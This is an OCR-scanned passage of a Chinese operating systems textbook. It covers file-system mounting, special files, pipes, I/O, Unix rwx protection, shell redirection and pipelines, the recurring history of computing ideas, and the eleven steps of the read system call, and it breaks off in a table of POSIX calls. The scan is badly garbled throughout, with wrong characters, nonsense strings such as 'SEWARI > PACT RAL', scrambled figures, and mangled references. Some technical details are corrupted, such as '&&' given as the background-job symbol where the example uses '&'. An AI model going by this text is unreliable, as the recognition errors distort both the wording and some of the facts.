文件 系统 上 。 在 图 1-15b 中 ，CD-ROM 上 的 文件 系统 安装 到 了 目录 b 上 ， 
这 样 束 介 许 访问 文件 /b/x 以 及 /b/y。 如 果 当 CD-ROM 安 闭 好 ， 目 录 b 中 有 
任何 不 能 访问 的 文件 ， 则 是 因为 b 指 向 了 CD-ROM 的 根 目 示 。 (在 开始 
时 ， 不 能 访问 这 些 文 件 似乎 并 不 是 一 个 产 重 问题 : 文件 系统 几乎 总 是 
安装 在 空 目 录 上 “。) 如 果 系 统 有 多 个 硬盘 ， 它 们 也 可 以 都 安装 在 单个 
树 上 。 


在 UNIX 中 ， 另 一 个 重要 的 概念 是 特殊 文件 (special file) 。 提 供 特 
殊 文 件 是 为 了 使 VO 设备 看 起 来 像 文件 一 般 。 这 样 ， 束 像 使 用 系统 调用 
读 写 文件 一 样 ，IO 设 备 也 可 通过 同样 的 系统 调用 进行 读 写 。 有 两 类 特 
殊 文件 ， 块 特殊 文件 (block special file) 和 字符 特殊 文件 (character 
special file) 。 块 特殊 文件 指 那 些 由 可 随机 存 取 的 块 组 成 的 设备 ， 如 磁 
盘 等 。 比 如 打开 一 个 块 特殊 文件 ， 然 后 读 第 4 块 ， 程 序 可 以 直接 访问 设 
备 的 第 4 块 而 不 必 考 虑 存放 该 文件 的 文件 系统 结构 。 类 似 地 ， 字 符 特 殊 
文件 用 于 打印 机 、 调 制 解 调 器 和 其 他 接收 或 输出 字符 流 的 设备 。 按 照 
惯例 ， 特 殊 文 件 保存 在 /dev 目 录 中 。 例 如 ，/dev/lp 是 打印 机 (曾经 称 为 
行 式 打 印 机 ) 。 


在 本 世 中 讨论 的 最 后 一 个 特性 既 与 进程 有 关 也 与 文件 有 关 : E 
道 。 管 道 (pipe) 是 一 种 虚 文件 ， 它 可 连接 两 个 进程 ， 如 图 1-16 所 示 。 
如 朱 进 程 A 和 B 布 望 通过 管道 对 话 ， 它 们 必须 提前 设置 该 管道 。 当 进程 
A 想 对 进程 B 发 送 数据 时 ， 它 把 数据 写 到 管道 上 ， 仿 佛 管道 区 是 输出 文 
件 一 样 。 进 程 B 可 以 通过 读 该 管道 而 得 到 数据 ， 仿 佛 该 管道 殴 是 一 个 输 
入 文件 一 样 。 这 样 ， 在 UNIX 中 两 个 进程 之 间 的 通信 束 很 类 似 于 普通 文 
件 的 读 写 了 。 更 为 强大 的 是 ， 夯 进程 要 想 发 现 它 所 写 入 的 输出 文件 不 
征 真 正 的 文件 而 是 管道 ， 则 需要 使 用 特殊 的 系统 调用 。 文 件 系统 是 非 
常 重要 的 。 我 们 将 在 第 6 章 ， 以 及 第 10 章 和 第 11 章 中 具体 讨论 它们 。 


Al 1-16 由 管道 连接 的 两 个 进程 


1.5.4 输入 /输出 


所 有 的 计算 机 都 有 用 来 获取 输入 和 产生 输出 的 物理 设备 。 毕 苋 ， 
如 采用 户 不 能 告诉 计算 机 该 做 什么 ， 而 在 计算 机 完成 了 所 要 求 的 工作 
之 后 况 不 能 得 到 结果 ， 那 么 计算 机 还 有 什么 用 处 呢 ? 有 各 种 类 型 的 输 
入 和 输出 设备 ， 包 括 键 盘 、 显 示 郁 、 打 印 机 等 。 对 这 些 设 备 的 管理 全 
然 依 靠 操 作 系统 。 


所 以 ， 每 个 操作 系统 都 有 管理 其 W/O 设备 的 /0O 子 系统 。 某 些 1/O 软 
件 是 设备 独立 的 ， 即 这 些 VO 软 件 部 分 可 以 同样 应 用 于 许多 或 者 全 部 的 
IO 设备 上 。IO 软 件 的 其 他 部 分 ， 如 设备 张 动 程序 ， 是 专门 为 特定 的 
IO 设备 设计 的 。 在 第 5 章 中 ， 我 们 将 讨论 MO 软件 。 


1.5.5 保护 


计算 机 中 有 大 量 的 信息 ， 用 户 经 党 希望 对 其 进行 保护 ， 并 保守 秘 
密 。 这 些 信息 可 包括 电子 邮件 、 商 业 计 划 、 退 税 等 诸多 内 容 。 管 理 系 
完 的 安全 性 完全 依靠 操作 系统 ， 例 如 ， 文 件 仅 供 授权 用 户 访问 。 


NS 


A 


作为 一 个 简单 的 例子 ， 以 便 读 者 对 如 何 实现 安全 有 一 个 概念 ， 请 
考察 UNIX。UNIX 操 作 系 统 通过 对 每 个 文件 赋予 一 个 9 位 的 二 进 制 保护 
代码 ， 对 UNIX 中 的 文件 实现 保护 。 该 保护 代码 有 三 个 3 位 字段 ， 一 个 
用 于 所 有 者 ， 一 个 用 于 所 有 者 同 组 〈 用 户 被 系统 管理 员 划 分 成 组 ) 中 
的 其 他 成 员 ， 而 男 一 个 用 于 其 他 人 。 每 个 字段 中 有 一 位 用 于 读 访 问 ， 
一 位 用 于 写 访 问 ， 一 位 用 于 执行 访问 。 这 些 位 就 古 知名 的 rwx 位 。 例 
如 ， 保 护 代 码 rwxr-x--x 的 含义 是 所 有 者 可 以 读 、 写 或 执行 该 文件 ， 其 
他 的 组 成 员 可 以 读 或 执行 (但 不 能 写 ， 该 文件 ， 而 其 他 人 可 以 执行 
(但 不 能 读 和 写 ) 该 文件 。 对 一 个 目录 而 言 ，x 的 含义 是 允许 查询 。 一 
条 短 横 线 的 信义 是 ， 不 存在 对 应 的 许可 。 


除了 文件 保护 之 外 ， 还 有 很 多 有 关 安 全 的 问题 存在 。 保 护 系统 不 
被 人 类 或 非 人 类 (如 病毒 ) 入 侵 ， 则 是 其 中 之 一 。 我 们 将 在 第 9 章 中 研 
完 各 种 安全 性 问题 。 


1.5.6 shell 


操作 系统 是 进行 系统 调用 的 代码 。 编 辑 器 、 编 译 器 、 汇 编程 序 、 
链接 程序 以 及 命令 解释 器 等 ， 尽 管 非常 重要 ， 也 非常 有 用 ， 但 是 它们 
确实 不 是 操作 系统 的 组 成 部 分 。 为 了 避免 可 能 发 生 的 混淆 ， 本 节 将 大 
致 介绍 一 下 UNIX 的 命令 解释 器 ， 称 为 shell。 尽 管 shell 本 喘 不 是 操作 系 
统 的 一 部 分 ， 但 它 体 现 了 许多 操作 系统 的 特性 ， 并 很 好 地 说 明了 系统 
调用 的 具体 用 法 。shell 同 时 也 是 终端 用 户 与 操作 系统 之 间 的 界面 ， 除 
非 用 户 使 用 的 是 一 个 图 形 用户 界 面 。 有 许多 种 类 的 shell， 如 sh、csh、 
ksh 以 及 bash 等 。 它 们 全 部 支持 下 面 所 介绍 的 功能 ， 这 些 功能 可 追溯 到 
早期 的 shell (Bish) ° 


用 户 和 登录 时 ， 同 时 局 动 了 一 个 shell 。 它 以 终端 作为 标准 输入 和 标 
准 输出 。 首 先 显示 提示 符 (prompt) ， 它 可 能 是 一 个 美元 符号 ， 提 示 
用 户 shell 正 在 等 行 授 收 命 令 。 假 如 用 户 键 入 


date 


于 是 shell 创 建 一 个 子 进程 ， 并 运行 date 程 序 作为 子 进程 。 在 该 子 
进程 运行 期 间 ，shell 等 待 它 结束 。 在 子 进程 结束 后 ，shell 青 次 显示 所 


示 符 ， 并 等 每 下 一 行 输入 。 
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date>file 


同样 地 ， 也 可 以 将 标准 输入 重 定 同 ， 如 : 


sort<file1>file2 


该 命令 调用 sort 程 序 ， 从 filel 中 取得 输入 ， 输 出 送 到 file2。 


可 以 将 一 个 程序 的 输出 通过 管道 作为 男 一 程序 的 输入 ， 因 此 有 


cat file1 file2 file3|sort>/dev/1p 


所 调用 的 cat 程 序 将 这 三 个 文件 合并 ， 其 结果 送出 到 sort 程 序 并 按 
字典 排序 。sort 的 输出 又 被 重 定 回 到 文件 /devip 中 ， 显 然 ， 这 是 打印 
机 。 


如 有 果 用 户 在 命令 后 加 上 一 个 “&&” 符 号 ， 则 shell 将 不 等 得 其 结束 ， 
而 直接 显示 出 提示 符 。 所 以 


cat file1 file2 file3|sort>/dev/lp& 


将 局 动 sort 程 序 作 为 后 台 任 务 执行 ， 这 样 就 可 以 允许 用 户 继 续 工 
作 ， 而 sort 命 令 也 继续 进行 。shell 还 有 许多 其 他 有 用 的 特性 ， 由 于 篇 幅 
有 限 而 不 能 在 这 里 讨论 。 有 许多 UNIX 的 书籍 具体 地 讨论 了 shell (fi 


WH, Kemighan#lPike, 1984; Kochan#llWood, 1990; Medinets, 
1999; Newham#Rosenblatt, 1998; Robbins, 1999) 


现在 ， 许 多 个 人 计算 机 使 用 GUI 。 事 实 上 ，GUI 与 shell 类 似 ，GUI 
只 是 一 个 运行 在 操作 系统 顶部 的 程序 。 在 Linux 系 统 中 ， 这 个 事实 更 加 
显 ， 因 为 用 户 (至 少 ) 可 以 在 两 个 GUI 中 选择 一 个 : Gnome 和 
DE， 或 者 干脆 不 用 〈 使 用 X11 上 的 终端 视窗 ) 。 在 Windows 中 也 有 可 
能 用 不 同 的 程序 代替 标准 的 GUI 桌面 (Windows Explorer) ， 这 可 以 通 
过 修改 注册 表 中 的 某 些 数值 实现 ， 不 过 极 少 有 人 这 样 做 。 


A 


1.5.7 个 体重 复 系统 发 育 


在 达尔 文 的 《物种 起 源 》 (On the Origin of the Species) 一 书 出 版 
之 后 ， 德 国 动物 学 家 Ernst Haeckel 论 述 了 “个 体重 复 系统 发 
育 ” (ontogeny recapitulates phylogeny) 。 他 这 人 句 话 的 含义 是 ， 一 个 个 
体重 复 着 物种 的 演化 过 程 。 换 句 话 说， 在 一 个 卵子 受精 之 后 ， 成 为 人 
体 之 前 ， 这 个 卵子 要 经 过 是 鱼 、 是 猪 等 阶段 。 现 代 生 物 学 家 认为 这 是 
一 种 粗略 的 简化 ， 不 过 这 种 观点 仍旧 包含 了 真理 的 内 核 部 分 。 


在 计算 机 的 历史 中 ， 类 似 情 形 依稀 发 生 。 每 个 新 物 种 (大 型 机 、 
SEWARI > PACT RAL > BE RAST RL > BRE RSE) ,无论 
征 便 件 还 是 软件 ， 似 乎 都 要 经 过 它们 前 府 的 发 展 阶 段 。 计 算 机 科学 和 
许多 领域 一 样 ， 主 要 是 由 技术 驱动 的 。 上 古 罗 号 人 缺少 汽车 的 原因 不 是 
因为 他 们 非常 喜欢 步行 ， 是 因为 他 们 不 知道 如 何 造 汽 车 。 个 人 计算 机 
的 存在 ， 不 是 因为 成 百 万 的 人 们 有 几 个 世纪 被 压抑 的 拥有 一 人 台 计 算 机 
的 愿望 ， 而 是 因为 现在 可 以 很 便宜 地 制造 它们 。 我 们 稼 常 筷 了 技术 是 
如 何 影响 着 我 们 对 各 种 系统 的 观点 ， 所 以 有 时 值得 再 仔细 考虑 它们 。 


特别 地 ， 技 术 的 变化 会 导致 某 些 思想 过 时 并 迅速 消 
经 常 发生。 但 是 ， 技 术 的 另 一 种 变化 还 可 能 再 次 复活 某 些 思想 。 在 技 
术 的 变化 影响 了 某 个 系统 不 同 部 分 之 间 的 相对 性 能 时 ， 情 况 束 会 是 这 
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缓存 是 很 重要 的 。 某 一 天 ， 如 果 新 的 存储 器 技 术 使 得 存储 器 远 快 于 

CPU 时 ， 高 速 缓存 就 会 消失 。 而 如 果 痢 的 CPU 技术 又 使 CPU 远 快 于 存 
储 右 时 ， 噩 速 缓存 束 会 再 次 出 现 。 在 生物 学 上 ， 消 失 是 永远 的 ， 但 是 
在 计算 机 科学 中 ， 这 一 种 消失 有 时 不 过 只 有 几 年 时 间 。 


在 本 书 中 ， 暂 时 消失 的 结 采 会 造成 我 们 有 时 需要 反复 考察 一 些 * 过 
时 ”的 概念 ， 即 那些 在 当代 技术 中 并 不 理想 的 思想 。 而 技术 的 变化 会 把 
些 “ 过 时 概念 ” 带 回 来 。 正 由 于 此 ， 更 重要 的 是 要 理解 为 什么 一 个 概 
念 会 过 时 ， 而 什么 样 环境 的 变化 义 会 局 用 “过 时 概念 ”。 


为 了 把 这 个 观点 叙述 得 更 透彻 ， 我 们 考虑 一 些 例子 。 早 期 计算 机 
采用 了 人 硬 连 线 指令 集 。 这 种 指令 可 由 硬件 直接 执行 ， 且 不 能 改变 。 然 
后 出 现 了 微 程序 设计 (首先 在 IBM 360 上 大 规模 引入 ) ， 其 中 的 解释 
絮 执 行 软 件 中 的 指令 。 于 古人 硬 连 线 执行 过 时 了 ， 因 为 不 够 灵活 。 接 着 
发 明了 RISC 计 算 机 ， 微 程序 设计 ( 即 解释 执行 过 时 了 ， 这 是 因为 直 
接 执 行 更 快 。 而 在 通过 Internet 发 送 并 且 到 达 时 才 解 释 的 Java 小 程序 形 
式 中 ， 我 们 又 看 到 了 解释 执行 的 复苏 。 执 行 速度 并 不 总 是 关键 因素 ， 
但 由 于 网 络 的 时 间 延 迟 是 如 此 之 大 ， 以 至 于 它 成 了 主要 因素 。 这 样 ， 
钟 摆 在 直接 执行 和 解释 之 间 已 经 时 动 了 好 几 个 周期 ， 也 许 在 未 来 还 会 


再 次 哆 动 。 
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现在 来 分 析 硬 件 的 某 些 历史 发 展 过 程 ， 并 看 看 硬件 是 如 何 重 复 地 
影 啊 软 件 的 。 第 一 代 大 型 机 内 存 有 限 。 在 1959 年 至 1964 年 之 间 ， 称 
为 “山寨 王 ” 的 IBM 7090 或 7094 满 载 也 只 有 128KB 多 的 内 存 。 该 机 锋 多 
数 用 汇编 语言 编程 ， 为 了 节省 内 存 ， 其 操作 系统 用 汇编 语言 编写 。 


随 着 时 代 的 前 进 ， 在 汇编 语言 宣告 过 时 时 ，FORTRAN 和 COBOL 
一 类 语言 的 编译 器 已 经 足够 好 了 。 但 是 在 第 一 个 商用 小 型 计算 机 
(PDP-1) 发 布 时 ， 却 只 有 4096 个 18 位 字 的 内 存 ， 而 且 令 人 吃惊 的 
是 ,汇编 语 言 又 回来 了 。 最 终 ， 小 型 计算 机 获得 了 更 多 的 内 存 ， 而 且 
高 级 语言 也 在 小 型 机 上 盛行 起 来 


在 20 世 纪 80 年 代 早 期 ， 微 型 计算 机 出 现时 ， 第 一 批 机 器 只 有 4 KB 
内 存 ， 汇 编 语言 又 复活 了 。 找 入 式 计算 机 经 常 使 用 和 微型 计算 机 一 样 
的 CPU 忌 片 《8080、Z80、 后 来 的 8086) 而 且 一 开始 也 使 用 汇编 编 
程 。 现 在 ， 它 们 的 后 代 ， 个 人 计算 机 拥有 大 量 的 内 存 ， 使 用 C、C++、 
Java 和 其 他 高 级 语言 编程 。 智 能 卡 正在 走 着 类 似 的 发 展 道路 ， 而 且 除 
了 确定 的 大 小 之 外 ， 智 能 卡通 常 使 用 Java 解 释 器 ， 解 释 执行 Java 程 
序 ， 而 不 是 将 Java 编 译 成 为 智能 卡 的 机 器 语言 。 


2. 保 护 硬 件 


早期 的 IBM 7090/7094 一 类 大 型 机 ， 没 有 保护 硬件 ， 所 以 这 些 机 器 
一 次 只 运行 一 个 程序 。 一 个 有 问题 的 程序 就 可 能 毁 掉 操作 系统 ， 并 且 


很 容易 使 机 右 骨 演 。 在 IBM 360 发 布 时 ， 提 供 了 保护 硬件 的 原型 ， 这 
些 机 器 可 以 在 内 存 中 同时 保持 车 干 程序 ， 并 让 它们 轮流 运行 (多 道 程 
序 处 理 ) 。 于 是 单 道 程序 处 理 宣告 过 时 。 


至 少 是 到 了 第 一 个 小 型 计算 机 出 现时 一 一 还 没有 保护 硬件 一 一 所 
以 多 道 程 序 处 理 也 不 可 能 有 。 尽 管 PDP-1 和 PDP-8 没 有 保护 硬件 ， 但 是 
PDP-11 型 机 器 有 了 保护 硬件 ， 这 一 特点 导致 了 多 道 程序 处 理 的 应 用 ， 
并 且 最 终 导致 UNIX 操 作 系 统 的 诞生 。 


在 建造 第 一 代 微 型 计算 机 时 ， 使 用 了 Intel 8080 CPU, BE 
有 保护 硬件 ， 这 样 我 们 又 回 到 了 单 道 程序 处 理 。 直 到 Intel 80286 才 增 
加 了 保护 硬件 ， 于 是 有 了 多 道 程序 处 理 。 直 到 现在 ， 许 多 骨 入 式 系统 
仍旧 没有 保护 硬件 ， 而 且 只 运行 单个 程序 。 


现在 来 考察 操作 系统 。 第 一 代 大 型 机 原本 没有 保护 硬件 ， 也 不 文 
等 多 道 程序 处 理 ， 所 以 这 些 机 画 只 运行 简单 的 操作 系统 ， 一 次 手工 只 
能 装载 一 个 程序 。 后 来 ， 大 型 机 有 了 你 护 人 硬件 ， 操 作 系统 可 以 同时 文 
持 运 行 多 个 程序 ， 接 着 系统 拥有 了 全 功能 的 分 时 能 力 。 


ts 


在 小 型 计算 机 刚 出 现时 ， 也 没有 你 护 硬 件 ， 一 次 只 运行 一 个 手工 
沪 载 的 程序 。 逐 渐 地 ， 小 型 机 有 了 保护 人 硬件， 有 了 同时 运行 两 个 或 更 
多 程序 的 能 力 。 第 一 代 微 型 计算 机 也 只 有 一 次 运行 一 个 程序 的 能 


但 古 随 后 具有 了 多 道 程序 的 能 力 。 掌 上 计算 机 和 智能 卡 也 走 着 类 似 的 
发 展 之 路 。 


在 所 有 这 些 案例 中 ， 软 件 的 发 展 生 受制 于 技术 的 。 例 如 ， 第 一 代 
微型 计算 机 有 约 4KB 内 存 ， 没 有 保护 硬件 。 高 级 语言 和 多 道 程序 处 理 
对 于 这 种 小 系统 而 言 ， 无 法 获得 文 持 。 随 着 微型 计算 机 演化 成 为 现代 
个 人 计算 机 ， 拥 有 了 必要 的 硬件 ， 从 而 有 了 必须 的 软件 处 理 以 支持 多 
种 先进 的 功能 。 这 种 演化 过 程 看 来 还 要 继续 多 年 。 其 他 的 领域 也 有 类 
似 的 这 种 轮回 现象 ， 但 是 在 计算 机 行业 中 ， 这 种 轮回 现象 似乎 变化 得 
nik 


3. 人 硬盘 


早期 大 型 机 主要 是 基于 磁带 的 。 机 器 从 磁带 上 读 入 程序 、 编 译 、 
运行 ， 并 把 结果 写 到 另 一 个 磁带 上 “。 那 时 没有 傍 盘 也 没有 文件 系统 的 
概念 。 在 IBM 于 1956 年 引入 第 一 个 磁盘 一 --RAMAC (RAndoM 
ACcess) 之 后 ， 事 情 开始 变化 。 这 个 磁盘 占据 4 平方 米 空 间 ， 可 以 存 
储 5 百 万 7 位 长 的 字符 ， 这 足够 存储 一 张 中 等 分 辨 率 的 数字 照片 。 但 是 
其 年 租金 高 达 35 000 美 元 ， 比 存储 占据 同样 空间 数量 的 胶卷 还 要 贵 。 
不 过 这 个 磁盘 的 价格 终于 还 是 下 降 了 ， 并 开始 出 现 了 原始 的 文件 系 


统 。 


拥有 这 些 新 技术 的 典型 机 器 是 CDC 6600， 该 机 器 于 1964 年 发 布 ， 
在 多 年 之 内 始终 是 世界 上 最 快 的 计算 机 。 用 户 可 以 通过 指定 名 称 的 方 
式 创建 所 谓 “ 永 久 文件 ”"， 希 望 这 个 名 称 还 没有 被 别人 使 用 ， 比 
如 “data” 就 是 一 个 适合 于 文件 的 名 称 。 这 个 系统 使 用 单 层 目录 。 后 来 
在 大 型 机 上 开发 出 了 复杂 的 多 层 文 件 系 统 ，MULTICS 文 件 系 统 可 以 算 
是 多 层 文件 系统 的 顶峰 。 


接着 小 型 计算 机 投入 使 用 ， 该 机 型 最 后 也 有 了 人 硬盘。1970 年 在 
PDP-11 上 引入 了 标准 硬盘 ，RK05 磁 盘 ， 容 量 为 2.5MB， 只 有 IBM 
RAMAC 一 半 的 容量 ， 但 是 这 个 磁盘 的 直径 只 有 40 厘 米 ，5 厘 米 高 。 不 
过 ， 其 原型 也 只 有 单 层 目录 。 随 着 微型 计算 机 的 出 现 ，CP/M 开 始 成 为 
操作 系统 的 主流 ， 但 是 它 也 只 是 在 ( 软 ) 盘 上 支持 单 目 录 。 


4. 虚 拟 内 存 


虚拟 内 存 (安排 在 第 3 章 中 讨论 ， ， 通 过 在 RAM 和 磁盘 中 反复 移 
动 信息 块 的 方式 ， 提 供 了 运行 比 机 顺 物 理 内 存 大 的 程序 能 力 。 虚 拟 内 
存 也 经 历 了 类 似 的 历程 ， 首 先 出 现在 大 型 机 上 ， 然 后 是 小 型 机 和 微型 
机 。 虚 拟 内 存 还 使 得 程序 可 以 在 运行 时 动态 地 链接 库 ， 而 不 是 必须 在 
编译 时 链接 。MULTIICS 是 第 一 个 可 以 做 到 这 点 的 系统 。 最 终 ， 这 个 思 


想 传播 到 所 有 的 机 型 上 ， 现 在 广泛 用 于 多 数 UNIX 和 Windows 系 统 中 。 


在 所 有 这 些 发 展 过 程 中 ， 我 们 看 到 ， 在 一 种 环境 中 出 现 的 思想 ， 
随 着 环境 的 变化 被 抛弃 (汇编 语言 设计 ， 单 道 程序 处 理 ， 单 层 目 录 
等 ) ， 通 常 在 十 年 之 后 ， 该 思想 在 另 一 种 环境 下 又 重 现 了 。 由 于 这 个 
原因 ， 本 书 中 ， 我 们 将 不 时 回顾 那些 在 今日 的 G 字 节 PC 机 中 过 时 的 思 
想 和 算法 ， 因 为 这 些 思想 和 算法 可 能 会 在 舱 入 式 计算 机 和 智能 卡 中 再 
现 。 


16 系统 调用 


我 们 已 经 看 到 操作 系统 具有 两 种 功能 : 为 用 户 程序 提供 抽象 和 管 
理 计算 机 资源 。 在 多 数 情形 下 ， 用 户 程序 和 操作 系统 之 间 的 交互 处 理 
的 是 前 者 ， 例 如 ， 创 建 、 写 入 、 读 出 和 删除 文件 。 对 用 户 而 言 ， 资 源 
管理 部 分 主要 是 透明 和 自动 完成 的 。 这 样 ， 用 户 程序 和 操作 系统 之 间 
的 交互 主要 就 是 处 理 抽象 。 为 了 真正 理解 操作 系统 的 行为 ， 我 们 必须 
仔细 地 分 析 这 个 接口 。 接 口中 所 提供 的 调用 随 厦 操作 系统 的 不 同 而 变 
化 (尽管 基于 的 概念 是 类 似 的 ) 。 


这 样 我 们 不 得 不 在 如 下 的 可 能 方式 中 进行 选择 (1) 含混 不 清 的 
一 般 性 叙述 (“操作 系统 提供 读 取 文件 的 系统 调用 ”) ; (2) 某 个 特定 
的 系统 (“UNIX 提 供 一 个 有 三 个 参数 的 read 系 统 调 用 ， 一 个 参数 指定 文 
件 ， 一 个 说 明 数 据 应 存放 的 位 置 ， 允 一 个 说 明 应 读 出 多 少 个 字 季 ”) 。 


我 们 选择 后 一 种 方式 。 这 种 方式 需要 更 多 的 努力 ， 但 是 它 能 更 多 
地 洞察 操作 系统 具体 在 做 什么 。 尽 管 这 样 的 讨论 会 涉及 专门 的 POSIX 
(International Standard 9945-1) ， 以 及 UNIX、System V ` BSD ` 
Linux、MINIX3 等 ， 但 是 多 数 现代 操作 系统 都 有 实现 相同 功能 的 系统 
调用 ， 尽 管 它们 在 细节 上 差别 很 大 。 由 于 引发 系统 调用 的 实际 机 制 是 
非常 依赖 于 机 器 的 ， 而 且 必 须 用 汇编 代码 表达 ， 所 以 ， 通 过 提供 过 程 
库 使 C 程 序 中 能 够 使 用 系统 调用 ， 当 然 也 包括 其 他 语言 。 


记 住 下 列 事项 是 有 益 的 。 任 何 单 CPU 计算 机 一 次 只 能 执行 一 条 指 
令 。 如 果 一 个 进程 正在 用 户 态 中 运行 一 个 用 户 程序 ， 并 且 需 要 一 个 系 
统 服务 ， 比 如 从 一 个 文件 读数 据 ， 那 么 它 惑 必须 执行 一 个 陷阱 或 系统 
调用 指令 ， 将 控制 转移 到 操作 系统 。 操 作 系统 接着 通过 参数 检查 ， 找 
出 所 需要 的 调用 进程 。 然 后 ， 它 执行 系统 调用 ， 并 把 控制 返回 给 在 系 
统 调用 后 面 跟 随 着 的 指令 。 在 某 种 意义 上 ， 进 行 系统 调用 就 像 进行 一 
个 特殊 的 过 程 调 用 ， 但 是 只 有 系统 调用 可 以 进入 内 核 ， 而 过 程 调 用 则 
不 能 。 


为 了 使 系统 调用 机 制 更 清晰 ， 让 我 们 简要 地 考察 read 系 统 调用 。 如 
上 所 述 ， 它 有 三 个 参数 : 第 一 个 参数 指定 文件 ， 第 二 个 指 同 缓 冲 区 ， 
第 三 个 说 明 要 读 出 的 字 市 数 。 几 乎 与 所 有 的 系统 调用 一 样 ， 它 的 调用 
由 C 程 序 完 成 ， 方 法 是 调用 一 个 与 该 系统 调用 名 称 相同 的 库 过 程 : 
read。 由 C 程 序 进行 的 调用 可 有 如 下 形式 : 


count=read(fd,buffer,nbytes ) ， 


系统 调用 (以 及 库 过 程 )》 在 count 中 返回 实际 读 出 的 字 市 数 。 这 个 
值 通 闸 和 nbytes 相 同 ， 但 也 可 能 更 小 ， 例 如 ， 如 琳 在 读 过 程 中 中 到 了 文 
件 尾 的 情形 束 古 如 此 。 


如 果 系 统 调用 不 能 执行 ， 不 论 是 因为 无 效 的 参数 还 是 磁盘 错误 ， 
count 都 会 被 置 为 -1， 而 在 全 局 变量 errno 中 放 入 错误 号 。 程 序 应 该 经 党 


检查 系统 调用 的 结 来 ， 以 了 解 是 否 出 错 。 


系统 调用 是 通过 一 系列 的 步骤 实现 的 。 为 了 更 清楚 地 说 明 这 个 概 
念 ， 考 察 上 面 的 read 调 用 。 在 准备 调用 这 个 实际 用 来 进行 read 系 统 调 用 
的 read 库 过 程 时 ， 调 用 程序 首 移 把 参数 压 进 堆栈 ， 如 图 1-17 中 步骤 1 一 
步骤 3 所 示 。 


地 址 
OxFFFFFFFF 
返回 到 调用 者 
陷入 内 核 库 过 程 read 
5| 把 用 于 read 的 代码 放 在 寄存 器 中 
用 户 空间 


增加 SP 11 
调用 read | 


调用 read 的 
用 户 程序 


内 核 空间 


系统 调用 
(操作 系统 ) 处 理 程序 


图 1-17 完成 系统 调用 read 的 11 个 步骤 


由 于 历史 的 原因 ，C 以 及 C++ 编译 器 使 用 逆序 (必须 把 第 一 个 参数 
赋 给 printf RFE) ， 放 在 堆栈 的 顶部 ) 。 第 一 个 和 第 三 个 参数 是 
值 调用 ， 但 是 第 二 个 参数 通过 引用 传递 ， 即 传递 的 是 缓冲 区 的 地 址 
(由 多 指示 ) ， 而 不 是 缓冲 区 的 内 容 。 接 着 是 对 库 过 程 的 实际 调用 
(第 4 步 ) 。 这 个 指令 是 用 来 调用 所 有 过 程 的 正常 过 程 调用 指令 。 


在 可 能 是 由 汇编 语言 写成 的 库 过 程 中 ， 一 般 把 系统 调用 的 编号 放 
在 操作 系统 所 期 望 的 地 方 ， 如 寄存 器 中 《第 5 步 ) 。 然 后 执行 一 个 
TRAP 指 令 ， 将 用 户 态 切换 到 内 核 态 ， 并 在 内 核 中 的 一 个 固定 地 址 开始 
执行 (Bex) 。TRAP 指 令 实际 上 与 过 程 调用 指令 相当 类 似 ， 它 们 后 
面 都 跟随 一 个 来 目 远 地 位 置 的 指令 ， 以 及 供 以 后 使 用 的 一 个 保存 在 栈 
中 的 返回 地 址 。 


然而 ，TRAP 指 令 与 过 程 指令 存在 两 个 方面 的 差别 。 首 先 ， 它 的 副 
作用 是 ， 切 换 到 内 核 态 。 而 过 程 调 用 指令 并 不 改变 模式 。 其 次 ， 不 像 
给 定 过程 所 在 的 相对 或 绝对 地 址 那样 ，TRAP 指 令 不 能 跳 转 到 任意 地 址 
上 上 。 根 据 机 絮 的 体系 结构 ， 或 者 跳 转 到 一 个 单 国定 地 址 上 ， 或 者 指令 
中 有 一 8 位 长 的 字段 ， 它 给 是 了 内 存 中 一 张 表格 的 索引 ， 这 张 表格 中 合 
有 跳 园地 址 。 


跟随 在 TRAP 指 令 后 的 内 核 代码 开始 检查 系统 调用 编号 ， 然 后 发 出 
正确 的 系统 调用 处 理 命令 ， 这 通 音 是 通过 一 张 由 系统 调用 编号 所 引用 
的 、 指 向 系统 调用 处 理 器 的 指针 表 来 完成 〈 第 7 步 ) 。 此 时 ， 系 统 调用 


句柄 运行 〈 第 8 步 ) 。 一 旦 系统 调用 句柄 完成 其 工作 ， 控 制 可 能 会 在 跟 
随 TRAP 指 令 后 面 的 指令 中 返回 给 用 户 空间 库 过 程 《第 9 步 ) 。 这 个 过 
程 接着 以 通常 的 过 程 调用 返回 的 方式 ， 返 回 到 用 户 程序 (第 10 步 ) 。 


为 了 完成 整个 工作 ， 用 户 程序 还 必须 清除 堆栈 ， 如 同 它 在 进行 任 
何 过 程 调用 之 后 一 样 (第 11 步 ) 。 假设 堆栈 向 下 增长 ， 如 经 常 所 做 的 
那 桩 ， 编 译 后 的 代码 准确 地 增加 堆栈 指针 值 ， 以 便 请 除 调 用 read 之 前 压 
入 的 参数 。 在 这 之 后 ， 原 来 的 程序 就 可 以 随意 执行 了 。 


在 前 面 第 9 步 中 ， 我 们 提 到 “控制 可 能 会 在 跟随 TRAP 指 令 后 面 的 指 
令 中 返回 给 用 户 空 间 库 过 程 >， 这 是 有 原因 的 。 系 统 调 用 可 能 堵塞 调用 
者 ， 避 免 它 继续 执行 。 例 如 ， 如 果 试 图 读 键 盘 ， 但 是 并 没有 任何 键 
和 入， 那么 调用 者 吏 必 须 被 阻 蹇 。 在 这 种 情形 下 ， 操 作 系 统 会 查看 忌 否 
有 其 他 可 以 运行 的 进程 。 稍 后 ， 当 需要 的 输入 出 现时 ， 进 程 会 提醒 系 
统 注 意 ， 然 后 步骤 9 一 步骤 11 会 接着 进行 。 


下 面 儿 节 中 ， 我 们 将 考察 一 些 间 用 的 POSIX 系 统 调用 ， 或 者 用 更 
专业 的 说 法 ， 考 察 进行 这 些 系 统 调用 的 库 过 程 。POSIX 大 约 有 100 个 过 
程 调 用 ， 它 们 中 最 重要 的 过 程 调用 列 在 图 1-18 中 。 为 方便 起 见 ， 它 们 被 
分 成 4 类 。 我 们 用 文字 简要 地 叙述 其 作用 。 


pid = fork() 创建 与 父 进程 相同 的 子 进程 
等 待 一 个 子 进程 终止 
符 换 一 个 进程 的 核心 映像 
中 止 进程 执行 并 返回 状态 


pid = waitpid(pid, &statloc,options) 


s = execve(name, argv, environp) 


exit(status) 


文件 管理 


说 BH 
打开 一 个 文件 供 读 、 写 或 两 者 
把 数据 从 一 个 文件 读 到 缓冲 区 中 
把 数据 从 缓冲 区 写 到 一 个 文件 中 


取得 文件 的 状态 信息 


调 用 
fd = open(file, how, ...) 


s = close(fd) 


n = read(fd, buffer, nbytes) 
n = write(fd, buffer, nbytes) 


position = lseek(fd, offset, whence) 


s = stat(name, &buf) 


